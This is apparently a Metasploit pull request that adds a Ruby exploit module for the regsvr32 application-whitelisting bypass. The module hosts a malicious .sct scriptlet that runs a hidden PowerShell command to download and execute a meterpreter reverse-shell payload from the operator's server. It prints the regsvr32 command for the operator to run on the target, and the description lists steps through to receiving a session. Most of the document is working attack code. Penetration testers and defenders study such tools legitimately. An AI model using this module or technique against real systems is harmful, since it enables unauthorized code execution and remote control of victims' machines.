### PR TITLE
Regsvr32.exe Application Whitelist Bypass Server

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -266,6 +266,3 @@ DEPENDENCIES
   simplecov
   timecop
   yard
-
-BUNDLED WITH
-   1.12.5

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -266,3 +266,6 @@ DEPENDENCIES
   simplecov
   timecop
   yard
+
+BUNDLED WITH
+   1.12.5

--- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
+++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
@@ -29,10 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'Payload'    => 'windows/meterpreter/reverse_tcp'
         },
-      'Targets'        => [
-        ['PSH', {}],
-        ['CMD', {}]
-      ],
+      'Targets'        => [['PSH', {}]],
       'Platform'       => %w(win),
       'Arch' => [ARCH_X86, ARCH_X86_64],
       'DefaultTarget'  => 0,
@@ -42,17 +39,12 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html']
         ]
     ))
-    register_options(
-      [
-        OptString.new('CMD',[false, 'The command to execute (For use with the CMD Target option only)',''])
-      ])
   end
 
 
   def primer
-    url = get_uri
     print_status('Run the following command on the target machine:')
-    print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll")
+    print_line("regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll")
   end
 
 
@@ -69,21 +61,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def serve_sct_file
     print_status("Handling request for the .sct file from #{cli.peerhost}")
-    url = get_uri
-    case target.name
-    when 'PSH'
-      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
-      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
-      download_and_run = "#{ignore_cert}#{download_string}"
-      psh_command = generate_psh_command_line(
-        noprofile: true,
-        windowstyle: 'hidden',
-        command: download_and_run
-      )
-      data = gen_sct_file(psh_command)
-    when 'CMD'
-      data = gen_sct_file(datastore['CMD'])
-    end
+    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+    download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(get_uri)
+    download_and_run = "#{ignore_cert}#{download_string}"
+    psh_command = generate_psh_command_line(
+      noprofile: true,
+      windowstyle: 'hidden',
+      command: download_and_run
+    )
+    data = gen_sct_file(psh_command)
     send_response(cli, data, 'Content-Type' => 'text/plain')
   end
 

--- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
+++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def gen_sct_file(command)
-    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}");]]></script></registration></scriptlet>}
+    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>}
   end
 
 end

--- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
+++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
@@ -1,0 +1,101 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Regsvr32.exe (.sct) Application Whitelisting Bypass Server',
+      'Description'  => %q(
+        This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique.
+        The module creates a web server that hosts an .sct file. When the user types the provided regsvr32
+        command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command.
+        This command then downloads and executes the specified payload (similar to the web_delivery module with PSH).
+        Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.
+      ),
+      'License'      => MSF_LICENSE,
+      'Author'       =>
+        [
+          'Casey Smith @subTee', # AppLocker bypass research and vulnerability discovery
+          'Trenton Ivey "kn0"', # MSF Module
+        ],
+      'DefaultOptions' =>
+        { 
+          'Payload'    => 'windows/meterpreter/reverse_tcp'
+        },
+      'Targets'        => [['Windows', {}]],
+      'Platform'       => %w(win),
+      'Arch' => [ARCH_X86, ARCH_X86_64],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 19 2016',
+      'References'     =>
+        [
+          ['URL', 'http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html']
+        ]
+    ))
+  end
+
+
+  def primer
+    url = get_uri
+    print_status('Run the following command on the target machine:')
+    print_line("regsvr32 /s /n /u /i:#{url}.sct scrobj.dll")
+  end
+
+
+  def on_request_uri(cli, _request)
+    # If the resource request ends with '.sct', serve the .sct file
+    #   Otherwise, serve the PowerShell payload
+    if _request.raw_uri =~ /\.sct$/
+      serve_sct_file
+    else
+      serve_psh_payload
+    end
+  end
+
+
+  def serve_sct_file
+    print_status("Handling request for the .sct file from #{cli.peerhost}")
+    url = get_uri
+    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+    download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
+    download_and_run = "#{ignore_cert}#{download_string}"
+    psh_command = generate_psh_command_line(
+      noprofile: true,
+      windowstyle: 'hidden',
+      command: download_and_run
+    )
+    data = gen_sct_file(psh_command)
+    send_response(cli, data, 'Content-Type' => 'text/plain')
+  end
+
+
+  def serve_psh_payload
+    print_status("Delivering Payload to #{cli.peerhost}")
+    data = cmd_psh_payload(payload.encoded,
+      payload_instance.arch.first,
+      remove_comspec: true,
+      use_single_quotes: true
+    )
+    send_response(cli,data,'Content-Type' => 'application/octet-stream')
+  end
+
+
+  def rand_class_id
+    "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
+  end
+
+  def gen_sct_file(command)
+    %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}");]]></script></registration></scriptlet>}
+  end
+
+end

--- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
+++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def serve_psh_payload
-    print_status("Delivering Payload to #{cli.peerhost}")
+    print_status("Delivering payload to #{cli.peerhost}")
     data = cmd_psh_payload(payload.encoded,
       payload_instance.arch.first,
       remove_comspec: true,

--- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
+++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Trenton Ivey "kn0"', # MSF Module
         ],
       'DefaultOptions' =>
-        { 
+        {
           'Payload'    => 'windows/meterpreter/reverse_tcp'
         },
       'Targets'        => [['Windows', {}]],

--- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
+++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
@@ -3,9 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-require 'msf/core/exploit/powershell'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
@@ -25,8 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'      => MSF_LICENSE,
       'Author'       =>
         [
-          'Casey Smith @subTee', # AppLocker bypass research and vulnerability discovery
-          'Trenton Ivey "kn0"', # MSF Module
+          'Casey Smith',  # AppLocker bypass research and vulnerability discovery (@subTee)
+          'Trenton Ivey', # MSF Module (kn0)
         ],
       'DefaultOptions' =>
         {

--- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
+++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
@@ -32,7 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'Payload'    => 'windows/meterpreter/reverse_tcp'
         },
-      'Targets'        => [['Windows', {}]],
+      'Targets'        => [
+        ['PSH', {}],
+        ['CMD', {}]
+      ],
       'Platform'       => %w(win),
       'Arch' => [ARCH_X86, ARCH_X86_64],
       'DefaultTarget'  => 0,
@@ -42,6 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html']
         ]
     ))
+    register_options(
+      [
+        OptString.new('CMD',[false, 'The command to execute (For use with the CMD Target option only)',''])
+      ])
   end
 
 
@@ -66,15 +73,20 @@ class MetasploitModule < Msf::Exploit::Remote
   def serve_sct_file
     print_status("Handling request for the .sct file from #{cli.peerhost}")
     url = get_uri
-    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
-    download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
-    download_and_run = "#{ignore_cert}#{download_string}"
-    psh_command = generate_psh_command_line(
-      noprofile: true,
-      windowstyle: 'hidden',
-      command: download_and_run
-    )
-    data = gen_sct_file(psh_command)
+    case target.name
+    when 'PSH'
+      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
+      download_and_run = "#{ignore_cert}#{download_string}"
+      psh_command = generate_psh_command_line(
+        noprofile: true,
+        windowstyle: 'hidden',
+        command: download_and_run
+      )
+      data = gen_sct_file(psh_command)
+    when 'CMD'
+      data = gen_sct_file(datastore['CMD'])
+    end
     send_response(cli, data, 'Content-Type' => 'text/plain')
   end
 


### PR DESCRIPTION
This module simplifies setup and execution of the Regsvr32.exe Application Whitelisting Bypass technique disclosed by @subtee. The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.
## Verification
- [x] Start `msfconsole`
- [x] Enter `use exploit/windows/misc/regsvr32_applocker_bypass_server`
- [x] Enter `set LHOST  192.168.133.7`
- [x] Enter `run`
- [x] **Verify** Module outputs regsvr command to msf user
- [x] Copy and paste provided command into a console on a target windows system
- [x] **Verify** Target system requests the .sct file from module's web server
- [x] **Verify** Module serves properly formatted .sct file
- [x] **Verify** Target system executes the PowerShell command included in the .sct file and requests PowerShell payload from the module's web server
- [x] **Verify** Module serves appropriately formatted payload
- [x] *\* Verify*\* Target system executes the payload
- [x] **Verify** Handler receives session from target system (based on selected payload)
